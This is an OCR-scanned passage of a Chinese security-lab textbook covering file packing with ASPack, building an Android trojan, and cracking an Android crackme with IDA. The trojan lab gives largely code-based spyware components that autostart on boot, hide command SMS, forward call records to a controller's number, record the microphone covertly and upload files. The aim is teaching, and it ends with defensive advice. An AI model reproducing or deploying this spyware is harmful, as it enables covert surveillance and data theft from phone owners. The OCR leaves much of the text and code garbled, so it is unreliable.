为 便于 操作 ,本 实验 选择 在 一 台 运 行 Windows XP 及 以 上 版 本 的 计算 机 上 进行 ,同时 需 
要 提供 ASPack 工具 。 


7.1.3 实验 过 程 


步骤 1: 运行 ASPack 工具 ,打开 如 图 7-1 所 示 的 ASPack 操作 界面 。 
步骤 2. 单 击 “打开 ”按钮 ,在 打开 的 如 图 7-2 所 示 的 对 话 框 中 选择 要 进行 加 过 的 程序 ， 
本 实验 使 用 已 经 准备 的 testl. exe 文件 , 单 击 “ 打 开 ” 按 钮 返回 ASPack 操作 界面 。 


$ ASPack 2.12 


Win32 EXE, DLL EM 2 FF 
UNREGISTERED 
30 days 


EŠ 2.12 


打开 文件 | 压缩 | 选项 | 关于 | 帮助 | 


| 


文件 条 


文件 大 小 UESRI 


TFH (T): [Executable File Images (*. EXE;*. DLL; w 取消 


图 7-1 ASPack 操作 界面 图 7-2 选择 要 加 壳 的 程序 


步骤 3. 单 击 “ 压 缩 ” 按 钮 ,对 刚才 选择 的 testl. exe 文件 进行 压缩 (加 壳 ) 操 作 ,如 图 7-3 
所 示 。 
等 ASPack 2.12 
Win32 EXE, DLL 压缩 程序 


注册 给 
UNREGISTERED 
30 days 


FER SC P AS 


uem | MEM  ::- — 


b: | testlere 
7-3 Xj testl. exe 文件 进行 压缩 操作 
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步骤 4. 加 壳 操 作 结 束 后 ,打开 原来 存放 testl. exe 的 “测试 程序 1” 文 件 夹 , 可 以 发 现 多 
一 个 名 称 为 testl. exe. bak 的 文件 ,这 个 文件 应 该 是 testl. exe 未 加 壳 时 的 备份 文件 ,而 现 
在 的 testl. exe 文件 是 已 经 被 加 元 后 的 文件 ,如 图 7-4 所 示 。 


THD 编辑 FF) SEV KEAN IAM 帮助 00 


Qa- O h per rer p 


地 址 (0) (C) C:\tools\ASPack 加 过 实验 \ 测 试 程序 1 


A testl. exe. bak 
BAK 交 件 


文件 和 文件 夹 寿 务 A) 


2E E nr. 
Q 将 这 个 文件 天 发 市 


= "— 


169 KB 


(Cy iPad AR 
Q 我 的 文档 
p 共享 文档 
P itus 


3 ro 


图 7-4 显示 已 加 壳 和 未 加 壳 的 文件 


步骤 5: 使 用 加 学 检测 工具 对 “测试 程序 1 文件 夹 进行 扫描, 就 会 发 现 testl. exe 是 被 
加 壳 后 的 程序 。 本 实验 使 用 VirRemv 对 “测试 程序 1” 文 件 夹 进行 扫描 ,扫描 过 程 如 图 7-5 
HIZR. 


£- CIH & Klez Virus Scanner 


Path: 
lc: \toolstASPacd AAE MAAE 1 Browse | 
Infected Files: 


Path Infection 
testi. exe. bak C:AtoolskASPackJEESeAs i... —w32-Cih 


Total Infected i 
sup | Tiere — mec ] 


C: V ool sMASPackd]o5 sed flit AR Br 1 16 BB. txt 


7-5 ”使 用 VirRemv 工具 扫描 存在 加 壳 文 件 的 文件 夹 


7.1.4 任务 与 思 


针对 文件 加 元 的 防范 方法 主要 有 以 下 两 种 。 

1. 签名 验证 

在 应 用 程序 发 布 时 ,每 一 款 应 序 都 会 有 一 个 专门 针对 该 款 软 件 的 数字 签名 ,用 来 验 
rpspetnh tient eher BR 
利用 该 特征 就 可 以 知道 一 款 应 用 程序 是 否 为 正版 软件 。 对 于 加 入 了 数字 签名 验证 代码 的 软 
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件 , 如 果 咨 版 者 对 其 进行 二 次 打包 时 没有 去 掉 验 证 代码 , 则 打包 生成 的 盗版 APP 在 运行 过 
程 中 就 会 自动 报 殴 ,被 安全 软件 识别 。 但 是 ,“ 道 高 一 尺 , 麻 高 一 丈 ” 的 道理 在 软件 盗版 领域 
显得 尤为 突出 ,如果 咨 版 者 具有 较 强 的 逆 回 分 析 水 平 ,能 够 找到 原 APP 的 数字 签名 代码 并 
移 除 或 屏蔽 ,就 可 以 避免 报警 。 为 此 ,要 较 好 地 解决 此 问题 ,单纯 从 软件 技术 上 是 无 法 实现 
的 ,目前 最 有 效 的 办 法 仍然 是 采用 验证 技术 ,将 安全 性 寄托 在 数字 签名 的 证 书 管理 上 O86 
可 通过 信誉 度 较 高 的 可 信 第 三 方 (如 知名 APP 安全 软件 商 ) 负 责 对 APP 进行 数字 签名 

2. 加 固 处 理 

应 用 加 固 是 近年 来 兴起 的 一 种 反 盗 版 、 防 复 改 技术 ,其 基本 方法 是 先 将 正版 应 用 程序 进 
行 反 汇编 ,之 后 对 程序 的 汇编 代码 进行 加 密 和 混 消 处 理 , 然 后 再 进行 重新 编 详 打 包 生 成 应 用 
程序 ,同时 由 正版 作者 对 经 过 加 固 处 理 的 应 用 程序 重新 进行 签名 。 经 过 加 固 处 理 的 应 用 程 
序 , 虽 然 理论 上 仍然 可 以 进行 反 汇 编 , 但 由 于 程序 事先 经 过 了 加 密 处 理 , 因 此 反 汇 编 之 后 代 
码 的 可 读 性 将 大 大 降低 。 相 应 地 ,盗版 者 对 程序 进行 逆向 分 析 的 难度 也 大 大 增加 ,使 得 盗版 
者 通常 较 难 在 原 有 代码 中 植 入 有 恶意 代码 ,从 而 可 以 有 效 地 阻止 应 用 程序 被 二 次 打包 和 自 改 。 


7.2 Android 手机 木马 程序 设计 


7.2.1 预备 知识 : Android 木马 程序 设计 方法 


为 了 实现 对 正常 通信 的 接管 ,木马 程序 需要 在 Android 设备 开机 时 月 动 运行 。 当 
Android 系统 启动 时 ,会 发 出 一 个 内 容 为 ACTION_BOOT_COMPLETED 的 系统 广播 ,其 
字符 串 和 常量 表示 为 android. intent. action. BOOT COMPLETED。 为 此 ,在 编写 木马 程序 
时 ,需要 在 程序 中 能 够 "捕捉 ?到 这 条 消息 ,随即 启动 即 可 。 

木马 主要 通过 接收 短信 的 系统 接收 者 (broadcast receiver) 进 行 短 信 内 容 匹 配 ,如 果 发 
送 的 是 控制 指令 , 则 将 短信 屏蔽 掉 ,让 被 控制 端 用 户 无 法 获得 接收 短信 的 通知 ,并 且 对 目标 
手机 进行 远程 控制 ,如 短信 转发 .电话 监听 、 手 机 录音 等 。 

木马 主要 利用 Android 中 的 广播 机 制 来 实现 控制 功能 。broadcast receiver 类 似 于 事件 
编程 中 的 监听 硕 , 是 一 种 广播 消息 接收 硕 。 木 马 重 与 了 onReceive(Context context, Intent 
intent) 方 法 , 当 系 统 收 到 消息 时 ,通过 监听 android. provider. Telephony. SMS RECEIVED 
广播 ,对 消息 的 内 容 进 行 检测 。 当 检测 到 的 内 容 为 控制 指令 时 ,用 abortbroadcast() 将 短信 
屏蔽 掉 ,使 用 户 无 法 接收 到 短信 ,然后 根据 控制 指令 进行 相应 操作 。 

需要 注意 的 是 ,如 果 数 据 量 比较 大 (如 录音 、 摄 像 数据 等 ) ,为 便于 实验 的 进行 ,可 架设 一 
台 服 务 硕 上 传 数据 。 


7.2.2 实验 目的 和 条 件 


1l. 实验 目的 
通过 本 实验 ,使 谈 者 学 习 并 和 擎 握 以 下 内 容 。 
CD 基于 Android 木马 程序 的 运行 机 制 。 
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(2) 编写 Android 木马 程序 ,通过 指令 实现 对 智能 手机 的 行为 控制 。 

(3) 掌握 相关 工具 的 使 用 方法 。 

2. 实验 条 件 

本 实验 可 以 在 Windows 7 及 以 上 操作 系统 上 进行 ,在 具体 进行 实验 之 前 ,需要 事先 构 
建 相 应 的 实验 环境 。 


7.2.3 实验 过 程 


步骤 1: 木马 自 启 动 功 能 的 实现 。 首 先 在 Main Activity 的 onCreate 方法 中 创建 一 个 
Text View 来 实现 程序 自动 启动 ,代码 如 下 。 


Protected vdid onCreate(Bundle savedInstanceState)( 
super. onCreate( saveldlnstanceState); 
setContentView(R.layout. activity main); 


TextVlew tv = new TextView(this); 
tv. setText( "Hello. I Started! ") 
this. setContentView(tv); 

} 


通过 继承 BroadcastReceiver 类 ,来 实现 一 个 接收 广播 消息 的 类 BootBroadcastReceiver。 通 
过 覆盖 onReceive 方法 ,检测 接收 到 的 Intent 是 否 符合 BOOT_COMPLETED, 如 果 符 合 ， 
则 局 动 MainActivity 中 的 Activity。 在 木马 程序 中 ,一 般 要 目 动 运行 的 不 是 界面 中 的 程序 ， 
而 是 在 后 台 运 行 的 服务 (service) 。 此 时 ,就 需要 用 startService 来 启动 相应 的 service。 代 码 
如 下 。 


public class BootBroadcastReceiver extends BroadcastReceive{ 


(à Override 
public void onReceive(Context context, Intent intent) ( 
final String ACTION = "android. intent.action. BOOT COMPLETED"; 
if(intent.getAction(). equals( ACTION) ) í 
Intent sayHellolntent = new Intent(context, MainActivity.class); 
sayHellolntent. addFlags(Intent. FLAG ACTIVITY NEW TASK); 
cnntext.startActivity(sayHellolntent); 
} 
} 
} 


步骤 2: 短信 自动 转发 。 同 样 继承 BroadcastReceiver 25, 
public class SmsReceiver extends BroadcastReceiver( 
private final String TAC - "SmsReceiver"; 


private static final String mACTION - "android. provider. Telephony. SMS RECEIVED"; 


(QOverride 
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public void onReceive(Context context, Intent intent) { 
if (intent.getAction(). equals( mACTION ) ) ( 


Log. HT -—— m € -— € ÓÀ € 2€ -— -— À - 2 $- 


Object[ ] pdus = (Object[ ]) intent.getExtras().get("pdus"); 
if (pdus!= null && pdus. length» 0){ 
SmsMessage[ ] message = new SmsMessage[ pdus. length]; 
for(int i= 0;i« pdus. length; i++){ 
byte[] pdu = (byte[ ]pdus[ i]); 
message[ i] = SmsMessage. createFromPdu ( pdu) ; 
) 


MessageHandler. serdMessage (message); 


步骤 3. 电话 监听 。 同 样 继 承 BroadcastReceiver 类 ,包含 接 电 话 和 打 电 话 。 


public class CallHoldRecelver extends BroadcastReceiver( 
private final static String mACTION = "android. intent. action. PHONE sTATE"; 


(QOverride 
public void onReceive(Context context, Intent intent)(í 


if(intent.getAction(). equals( mACTION ){ 
Date date = new Date( ) ; 
date. setTime(System. currentTimeMillis()); 
SimpleDateFormat format = new SimpleDateFormat( 
"yyyy - MM. dd HH:mm: ss"); 
StringBuilder smsCont - new StringBuilder(); 
smsCont. append( format. format(date)); 
smsCont. append( " -- "); 
smsCont. append( intent.getExtras().getString("incoming number")); 
smsCont. append(" -- "); 
smsCont. append( "callee"); 
smsCont. append( intent.getExtras().getString("incoming number")); 
MessageHandler. send (MainActivity. PHONENO. smsCont. toString()): 


} 


public class DialReceiver extends BroadcastReceiver( 
private static final String mACTION = "android. intent. action. NEW OUTGOING CALL"; 


(Q Override 
public void onReceive(Contexc context, Intent Intent)í 
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if (intent.getAction().equals( mACTION)( 
Date date = new Date( ); 
date. setTime(System. currentTimeMillis()); 
SimpleDateFormat format = new SimpleDateFormat( 
"yyyy - MM - dd HH:mm: ss"); 
StringBuilder smsCont = new StringBuilder(); 
sm sCont. append( format. format(date)); 
smsCont. append( " -- "); 
smsCont. append( intent.getStringExtra(Intent. EXTRA PHONE NUMBER)); 
SmsCont. append(" -- "); 
SmsCont. append("call to"); 
smsCont.append(intent.getStringExtra(Intent. EXTRA PHONE NUMBER)); 
MessageHandler. send(MainActivity. PHONENO, smsCont. toString()); 


步骤 4: 电话 录音 。 当 系统 收 到 消息 时 ,通过 监听 android. provider. Telephony. SMS _ 
RECEIVED 广播 ,对 消息 的 内 容 进 行 检 测 。 当 检测 到 的 内 容 为 录音 指令 时 , 用 
abortbroadcast() 将 短信 和 屏蔽 ,使 用 户 无 法 接收 到 短信 ,然后 创建 一 个 android BH F H 
MeidaRecorder 对 象 进行 录音 ,利用 计时 国 数 CountDownTimer JFTI TEE . 28 2$ onFinish O 
和 onTick() 方 法 ,实现 计时 30 秒 的 操作 。 


private void initializeAudio()í 
recorder = new MediaRecorder( ) 
recorder. setAudioSource(MediaRecorder. AudioSource. MIC); 
recorder. setOutputFormat(MediaRecorder. OutputFormat. RAW AMR); 
recorder. setAudioEncoder(MediaRecorder. AudioEncoder. AMR NB); 
recorder. setOutputFile("/sdcard/test. amr"); 


try( 
recorder. prepare( ) ; 
recorder. start(); 
)catch (1llegalStateException e)í( 
e. printStackTrace(); 
)catch (lOException e)í( 
e. printStackTrace(); 


步骤 5: 文件 转发 上 传 。 主 要 代码 如 下 。 


tryí 

DataOutputStream dos = new DataOutputStream( 
httpURLConnection. getOutputStream()); 

dos. writeBytes(twoHyphens + boundary + end); 

dos. writeBytes("Content - Disposition:form - data; 
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name = \"file\"; filename = \"" + 

filename. substring(filename. lastlndexOf("/") * 1) * "V" + end); 
dos. writeBytes(end); 

FilelnputStream fis = new FilelnputStream(filename); 
byte[] buffer = new byte[8192]; //8k 

int count = 0; 

while( (count = fis.read(buffer))!- - 1)( 

dos. write(buffer,0,count); 

} 

fis.close(); 

dos. writeBytes( end); 

dos.writeBytes(twoHyphens + boundary + twoHyphens + end); 
dos. flush(); 

InputStream is = httpURLConnection. getlnputStreanm(); 
InputStreamReader isr = new InputStreamReader( is, "utf ~ 8"); 
BufferedReader br = new BufferedReader( isr); 

String result = br. reactLine(); 

System. out. println(result); 

/ /Toast. makeText(this, result, 

Toast. LENGTH LONG). show( ) ; 

dos. close(); 

is.close(); 

)catch(Exception e){ 

System. our. println(" 未 找到 录音 文件 "); 

}} 


木马 程序 应 该 静默 运行 ,为 调试 方便 和 演示 效果 ,在 程序 开 
始 运 行 时 需要 用 户 设 定 监听 结果 转发 的 手机 号 码 , 结 果 如 图 7-6 


BUR. EA 


请 输入 接收 号 码 


7.2.4 任务 与 思考 sun 
l l E ETE pen 
id Android 手机 木马 程序 的 攻击 ,可 以 通过 以 下 几 个 方面 图 7-6 设 定 监听 结果 转发 
加 强 安全 管理 。 


的 手机 号 码 
(1) 不 随意 单 击 不 明 链接 ,由 于 绝 大 多 数 木马 程序 是 通过 


QQ 或 微 信 等 方式 发 送 链接 ,在 用 户 收 到 不 明 链 接 或 网 上 购物 时 ,一 定 要 验证 发 送 者 信息 的 
真实 性 。 

(2) 平时 养 成 关闭 Wi-Fi 或 蓝牙 功能 的 习惯 ,一 方面 防止 攻击 者 在 公共 场所 通过 Wi-Fi 
或 蓝牙 对 手机 进行 攻击 并 禄 取信 息 ; 男 一 方面 可 有 效 节 约 电 能 ,并 可 以 预防 通过 Wi-Fi 实 
施 定位 。 

(3) 及 时 备份 手机 等 移动 终端 中 的 数据 ,尤其 是 一 些 敏感 数据 ,以 防止 手机 因 攻 击 导 致 
无 法 正常 工作 ,需要 初始 化 时 不 至 于 丢失 数据 。 

(4). 从 运营 商 、 专 业 供 应 商 或 信誉 度 高 的 手机 软件 商店 处 更 新 软件 固件 ,避免 到 一 些 不 
明生 份 的 第 三 方 站 点 下 载 和 安 疲 固件 。 

(5) 为 手机 设置 流量 提醒 功能 ,避免 手机 不 幸 感 染病 毒 或 恶意 软件 后 台 偷 偷 联 网 造成 
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(6) 不 要 随意 用 手机 扫 二 维 码 ,二 维 码 已 经 成 为 恶意 程序 新 的 传播 途径 。 
(7) 从 安全 信誉 高 的 站 点 下 载 应 用 程序 。 


7.3 IDA 破解 实例 


7.3.1 预备 知识 : 人 逆向 工程 分 析 法 


逆向 工程 最 早 来 源 于 硬件 领域 ,主要 是 检查 硬件 开发 过 程 中 是 否 遵循 相关 的 规约 ,同时 
用 于 研究 他 人 的 系统 ,发 现 其 工作 原理 ,以 达到 复制 和 再 利用 的 目的 。 目 前 , 逆 回 工程 已 经 
被 引入 计算 机 领域 ,如 在 软件 工程 中 ,逆向 工程 可 用 于 人 研究 目标 系统 的 工作 原理 。 

逆 癌 工程 作为 一 个 新 兴 的 领域 ,在 软件 维护 中 有 大 重要 的 作用 。 充 分 利用 逆向 工程 技 
术 就 可 以 对 现 有 系统 进行 改造 ,减少 开发 强度 ,提高 软件 开发 效率 ,降低 项 目 开 发 的 经 济 成 
本 ,提高 经 济 效 益 , 并 在 一 定 程度 上 保证 软件 开发 和 利用 的 延续 性 。 

逆向 工程 也 是 信息 安全 技术 的 重要 组 成 部 分 。 通 过 逆向 工程 ,攻击 者 可 以 分 析 软 件 的 
目标 码 ,理解 程序 的 结构 和 程序 的 逻辑 ,甚至 可 以 改变 一 个 程序 的 结构 ,从 而 可 以 直接 影响 
程序 的 人 逻辑 流 。 例 如 ,软件 打 补 丁 (patching) 便 是 一 种 针对 逆向 工程 的 应 用 , 打 补 丁 允 许 在 
没有 源码 的 情况 下 ,添加 命令 或 改变 特殊 函数 调用 的 方式 ,这 使 得 软件 分 析 者 能 够 给 目标 程 
序 添 加 秘密 特性 、 删 除 函 数 或 禁用 函数 在 没有 源码 的 情况 下 定位 错误 等 。 

基于 逆向 工程 的 软件 漏洞 挖掘 技术 的 研究 路 线 是 将 要 分 析 的 二 进 制 代码 首先 反 汇 编 ， 
得 到 汇编 代码 ; 然后 对 汇编 代码 进行 切片 , 即 对 某 些 上 下 文 关 联 密 切 、 有 意义 的 代码 进行 汇 
聚 , 以 降低 其 复杂 性 ; 最 后 通过 分 析 功 能 模块 ,来 判断 是 否 存在 漏洞 。 在 网 络 攻防 过 程 中 ， 
当 发 现 漏 洞 后 ,就 可 以 根据 漏洞 产生 的 根源 开发 相应 的 渗透 工具 。 

按照 是 否 采 用 反 汇 编 和 反 编 译 得 到 其 高 级 语言 表述 的 代码 ,可 以 将 逆向 工程 的 方法 分 
为 日 箱 分 析 法 和 黑箱 分 析 法 。 其 中 ,日 箱 分 析 法 主要 是 对 源 代 码 进行 分 析 和 理解 。 对 于 所 
需 分 析 的 二 进 制 代码 采用 反 汇 编 ` 反 编译 的 方法 ,得 到 其 高 级 语言 形式 的 源 代码 ,并 进一步 
分 析 此 源 代 码 。 如 果 有 功能 优秀 的 反 编 译 工 具 的 文 持 ,日 箱 测 试 对 于 发 现 软件 中 设计 错误 
和 执行 错误 是 非常 有 效 的 。 然 而 日 箱 测 试 也 有 不 足 之 处 ,就 是 编译 后 产生 的 代码 和 其 真正 
的 源 代 码 可 能 会 存在 差异 ,因此 可 能 会 误 报 实际 上 不 存在 的 漏洞 。 

黑箱 分 析 法 就 是 利用 各 种 输入 对 程序 进行 探测 ,并 对 程序 运行 的 结果 进行 分 析 。 这 种 
分 析 方 法 仅 需 要 有 运行 的 程序 而 不 需要 分 析 任 何 形式 的 源 代 码 。 其 测试 条 件 是 可 运行 的 程 
序 、 能 接受 输入 及 可 以 观察 到 结果 。 如 果 测 试 者 能 给 运行 的 程序 提供 输入 ,并 可 以 观察 输出 
结果 ,就 可 以 进行 黑箱 测试 。 在 黑箱 测试 时 ,可 以 尽量 给 程序 提供 各 种 恶意 输入 回 量 , 如 果 
用 某 个 特定 的 测试 回 量 测试 程序 时 程序 出 现 异 党 ,就 预示 着 可 能 发 现 了 该 程序 的 一 个 漏洞 。 
相对 于 日 箱 测 试 , 黑 箱 测试 在 理解 代码 逻辑 和 程序 行为 等 方面 不 是 那么 有 效 ,而 且 黑 箱 测试 
需要 软件 分 析 者 具有 更 多 的 经 验 。 不 过 黑箱 测试 不 需要 反 汇 编 ` 反 编译 等 工具 的 文 持 ,更 容 

IDA (Interactive Disassembler. 42 H. 5X DL iL. fa AF ) JE — 3X JN AA HJ A6 HL c i 28 TH... E 
要 用 于 反 汇 编 和 动态 调试 。IDA 文 持 对 多 种 处 理 需 的 不 同类 型 可 执行 模块 进行 反 汇 编 处 
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理 , 具 有 方便 直观 的 操作 界面 ,可 以 为 用 户 呈 现 尽 可 能 接近 源 代 码 的 代码 ,减少 了 反 汇 编 工 
作 的 难度 ,提高 了 效率 。IDA 提供 了 较 好 的 分 析 技 术 , 它 具有 更 好 的 反 汇 编 、 深 层 分 析 和 保 
存 静 态 汇 编 等 优点 ,同时 ,利用 IDA 可 以 观察 到 jmop 命令 的 具体 跳 转 位 置 。 为 此 ,IDA 非常 
适合 于 恶意 代码 分 析 漏洞 研 究 ` 隐私 保 护 和 其 他 学 术 研 究 。 


7.3.2 实验 目的 和 条 件 


1. 实验 目的 


通过 本 实验 ,使 读者 在 学 习 逆 向 工程 分 析 方 法 的 基础 上 ,熟悉 静态 分 析 中 所 需要 的 关键 
知识 点 ,通过 具体 操作 了 解 IDA 工具 的 功能 及 使 用 方法 。 

2. 实验 条 件 

本 实验 可 以 在 Windows 7 操作 系统 上 通过 相关 的 工具 软件 来 实现 ,所 需要 的 主要 软件 
如 下 。 

(D IDA。 本 实验 使 用 IDA pro v6. 8。 

(2) WinRAR, 

(3) 静态 反 编 译 工 具 C32 ASM。 本 实验 使 用 C32 ASM v1. 0. 9. 0。 

(4) Android 逆 回 助手 v2. 2, 


7.3.3 实验 过 程 


首先 ,安装 实验 条 件 中 提 到 的 应 用 程序 。 其 中 ,在 安装 Android 逆向 助手 的 过 程 中 ,使 
用 jd-gui 阅读 java 代码 , 当 出 现 如 图 7-7 所 示 的 对 话 框 时 ,选中 “dex 转 jar” 单 选 按钮 。 


Q9 Androidi ARE v2.2 — X 
选择 : 
M 
RRF FER ”选项 
操作 : 
O Rifak  O 重 打 包 spk 。 〇 签名 pk Opd O 替换 dex O 修复 dex 


O 后 编译 lex O 重 打包 dex O dex 转 ddx O) dex 转 txt (9) dex 转 jar O) jar 转 dex 


〇 反 汇编 elf O xml 转 txt O jd 时 开 jar O apk 对 齐 


日 志 : 

apk 或 dex 转 jar... 

源 : D:\test\crackme0502. apk 

目标 : D:\test\crackme0502 dex2]ar. jar 

EHR... 

dex2jar version: translator—0. 0.9.15 

dex2jar D: \test\crackme0502. apk -> D: \test\orackme0502_dex2jar. jar 


Done. 
打开 成 功 . 


7-7 选择 Android 逆向 助手 的 反 编 译 方式 


步骤 1: 开始 使 用 IDA 分 析 。 将 要 分 析 文 件 的 扩展 名 由 apk 修改 为 zip。 然 后 解压 缩 
包 ,得 到 它 的 classes. dex 文件 ,再 将 classes. dex 文件 导入 IDA 中 ,操作 界面 如 图 7-8 
所 示 。 
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Eile Edit Jump Search View Debugger Options Windows Help | | 
LI-EELLLLIASWIJIrrsjr I [rv s 


AccessibilityServicelnfoCompat 1 
AccessibilityServiceInfoCompat' 
AccessibilityServiceInfoCompat' 
AccessibilityServiceInfoCompat' 
AccessibilityServiceInfoCompat: 
AccessibilityServiceInfoCompat: 
AccessibilityServiceInfoCompat: 
AccessibilityServiceInfoCompat' 
AccessibilityServiceInfoCompat' 
AccessibilityServiceInfoCompat' 
AccessibilityServiceInfoCompat: 
AccessibilityServiceInfoCompat' 
AccessibilityServiceInfoCompat, 
AccessibilityServiceInfoCompat. 
AccessibilityServiceInfoCompat, 
AccessibilityServicelnfoCompat, 
AccessibilityServiceInfoCompat, 
AccessibilityServiceInfoCompat, 
AccessibilityServiceInfoCompat, 
AccessibilityServiceInfoCompat, 
f | AccessibilityServiceInfoCompat. 
AccessibilityServiceInfoCompatl 
f | AccessibilityServicelnfoCompatl 
f | AccessibilityServiceInfoCompatl 
AccessibilityServiceInfoCompatl 
AccessibilityServiceInfoCompatl 
i pati 


: OANOAOHA s 
: 000060969 
: 06006069 
: 00006089 
: 0808680808 
: 000006099 
: 0ANAHHHA 
: 068008088 
: 00006080 
: 0000860898 
: 000060969 
: 0000009090 
:80008088 
ID8DD8088 
: 060060869 
:60008088 
: 88088088 
: 0600860989 # [00800878 BYTES: COLLAPSED SEGMENT HEADER. PRESS CTRL-NUMPAD* TO EXPAND] 
:000800780 # String ids 
:60080878 14 

: 00080970 

:00080870 # Segment type: 
:80080878 off 70: 

: 808088878 

: 8600860908790 

:6008007 0 

: 00080670 

— 


This file has been generated by The Interactiue Disassembler (IDA) 
Copyright (c) 2815 Hex-Rays, «support(3hex-rays .com» 
License info: 58-3255-7515-28 
Giancarlo Russo, HT Srl 


Input HD5 
Input CRC32 


2F955615C 0E8 00E96F 737FBh98F 78303 
3BFC9D61 


DEX Module, Interface version 7 
Input Dex File version 35 


Pure data 
.int unk 2F9FC, unk 2F9FE, unk 2Ff81, unk 2Fh85, unk 2FAgB 
E DATA XREF: HEFADER:00808003CÍO 
# MAP : 8884F3BC10 
unk_2FA27, unk_2FA4F, unk 2FR5F, unk 2FA82 
unk 2FRB9, unk 2FADA, unk 2FAF2, unk 2FB19 
unk 2FB62, unk_2FB6A, unk 2FB87, unk_2FBAA 


.int unk 2Ff18, 
-int unk 2FA9C, 
.int unk 2FB^1, 


7-8 IDA 操作 界面 


步骤 2: 切换 到 exports 选项 卡 ,输入 "mainactivity”, 找 到 第 二 个 onclick 函数 ,也 就 是 
对 应 的 MainActivity $ 2. onClick@VL, 如 图 7-9 所 示 。 


File Edit Jump Search View Debugger Options Windows Help 


AAA ali E Ol ak t a t e Xl O O parikad) t E i 


Library function P Data I Regular function BI LT Bl Instruction External symbol 


Functions window 


|f | AccessibilityServicelnfoCompat' 
|f | AccessibilityServiceInfoCompat' 
| f | AccessibilityServiceInfoCompat' 
|f | AccessibilityServicelnfoCompat' 
AccessibilityServiceInfoCompat' 
| f | AccessibilityServicelnfoCompat' 
|f | AccessibilityServiceInfoCompat' 
| f | AccessibilityServiceInfoCompat' 
|f | AccessibilityServiceInfoCompat' 
| f | AccessibilityServiceInfoCompat' 
| f | AccessibilityServicelnfoCompat' 
|f | AccessibilityServiceInfoCompat' 
| f | AccessibilityServiceInfoCompat, 
|f | AccessibilityServicelnfoCompat, 
| f | AccessibilityServicelnfoCompat, 
|f | AccessibilityServiceInfoCompat, 
AccessibilityServiceInfoCompat. 
|f | AccessibilityServiceInfoCompat 
| f | AccessibilityServiceInfoCompat, 
| f | AccessibilityServiceInfoCompat, 
|f | AccessibilityServicelnfoCompat, 
|f | AccessibilityServiceInfoCompatl 
|f | AccessibilityServicelnfoCompatl 
" AccessibilityServiceInfoCompatl 


3 


Name 


=| SimpleCursorAdapterchangeCursorAndColumnsQ VLLL 


=| SimpleCursorAdapterconvertToString LL 


=| SimpleCursorAdaptergetCursorToStringConverter&L 
s$| SimpleCursorAdaptergetStringConversionColumn(&I 


2| SimpleCursorAdaptergetViewBinder OL 


| SimpleCursorAdaptersetCursorToStringConverter( VL 
=| SimpleCursorAdaptersetStringConversionColumnQ VI 


=| SimpleCursorAdaptersetViewBinderG VL 
| SimpleCursorAdaptersetViewlmageQ VLL 
E SimpleCursorAdaptersetViewTextQ VLL 
| SimpleCursorAdapterswapCursorQLL 
=| MyAnno.«init» QV 

到 | MyAnno.outputinfoG V 

=| BuildConfig. «init» V 

各 | MainActivity$1.«init» VL 

s$| MainActivity$1.onClickG VL 

=| MainActivity$2. «init» VL 

E4 MainActivity$2.0nClickQ VL 

=| MainActivity$SNChecker.«init» VLL 

$*| MainActivity$SNCheckerisRegistered Z 
E MainActivity. «init» (V 

=| MainActivity.access$0G VL 

=| MainActivity.access$1GLL 

E MainActivity.getAnnotations V 

Sl Maint 


chivity.orn eate @ V 


TN 


7-9 


ni 


Address 


0002CE64 
0002CE90 
0002CED8 
0002CEFO 

0002CF08 

0002CF20 

0002CF38 

0002CF50 

0002CF68 

0002CFAC 

0002CFCA 
O002CFE8 

0002D000 
0002D020 
0002D038 
0002D054 
0002D070 
0002D08C 
0002DO0F4 

0002D114 
0002D1F8 

0002D210 
0002D228 
0002D240 
00020 


找到 MainActivity $ 2. onClick@ VL 


De x ares D | O mavit O | A seere O [O e OE ere 


Ordinal 


2578 
2579 
2581 
2582 
2583 
2584 
2585 
2586 
2587 
2588 
2589 
2968 
2969 
2974 
2975 
2976 
2977 
2978 
2979 
2980 
2981 
2982 
2983 
2985 


步骤 3. 双击 MainActivity $ 2. onClick@ VL 函数 进入 操作 界面 ,如 图 7-10 所 示 。 
步骤 4: f& Space 键 切换 到 IDA 的 流程 视图 ,如 图 7-11 所 示 。 
在 图 7-11 中 ,读者 可 以 清楚 地 看 到 代码 的 关键 点 就 是 if-eqz v2 和 loc 2DODC. H F 7c 


侧 箭头 表示 条 件 不 满足 时 执行 的 路 线 , 右 侧 的 箭头 表示 条 件 满 足 时 执行 的 路 线 。 
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JDE 7 BHBZD VY .llne Hi 

CODE : 8882D 88C neu-instance v8, «t: Hainfictivity$SNChecker? 
ODE : 8802D 89 8 iget-object v2, this, Mainfictivity$2 this$8 
0DE : 0002D 095 iget-object v3, this, HMainfictiuity$2 this$8 
0DE : 0002D 098 invoke-static {v3}, <ref Hainfictivity.access$1(ref) Ma 
ODE : 0002D 89E move-result-object v3 
ODE : 0002D HAA invoke-virtual {v3}, <ref EditText.getText() imp. @ de 
0DE : 0002D 8R6 nove-result-object v3 
ODE : 8882D 868 invoke-interface {v3}, <ref Editable.toString() imp. 8 wd 
ODE : 0002D HAE move-result-object v3 
0DE : 8002D 8B 8 invoke-direct (v8, v2, v3), «void Hainfictiuity$SNCheck 
0DE:8882D0B6 .local name:'checker' type:'Lcom/droider/crackme8582/Hainfictivity$SSNChecker ; ' 
0DE:6002D0B6 checker = v8 
ÜDE : 8002D 8B6 .line 45 
0DE : 8882D 8B6 invoke-virtual {checker}, «boolean Hainfictivity$SNCheck 
ODE : 0002D OBC move-result v2 
ODE : 0002D ABE if-eqz v2, loc 2D8DC 
ODE : 8862D 8C2 const-string v1, aCIxjmcabcngcbo # "iE 2 Qi 
ODE : 6002D GC 6 
0DE:88802D8C6 loc 2D8C66: # CODE XREF: Mainfctivity$2 onClick(3UL*55,j 
0DE:8882D8C6 .local name:'str' type:'Ljava/lang/String;' 
0DE:8802D8C6 str = vi 
ODE : 8882D 866 -line ^6 
ODE : 8082D 8C 6 iget-object v2, this, Mainfictivity$2 this$8 
ODE : 0002D OCA const/HA v3, 8 
ODE : 8882D ACC invoke-static (u2, str, v3}, <ref Toast.makeTextí(ref, t 
0DE : 8682D 8D2 noue-result-object v2 
ODE : 8802D 8D invoke-virtual {u2}, «void Toast.show() imp. (4 def Toad 
ODE : 0002D ADA 


7-10 MainActivity $ 2. onClick(2 VL 函数 操作 界面 


8 Source file: Mainfctivity.]java 
public void com.droider.crackme MS 82 .Maíinhctivity$2 .onClick( 
android.vieu.Uiew v) 


v8, «t: Mainactivity$SMChecker? 

v2, this, Mainfctiuity$2 thisjo 

v3, this, Mainüctiuity$2 thisjo9 
invoke-static (v3), «ref HainRctivity.access$1(ref) Mainactivity access$19LL» 
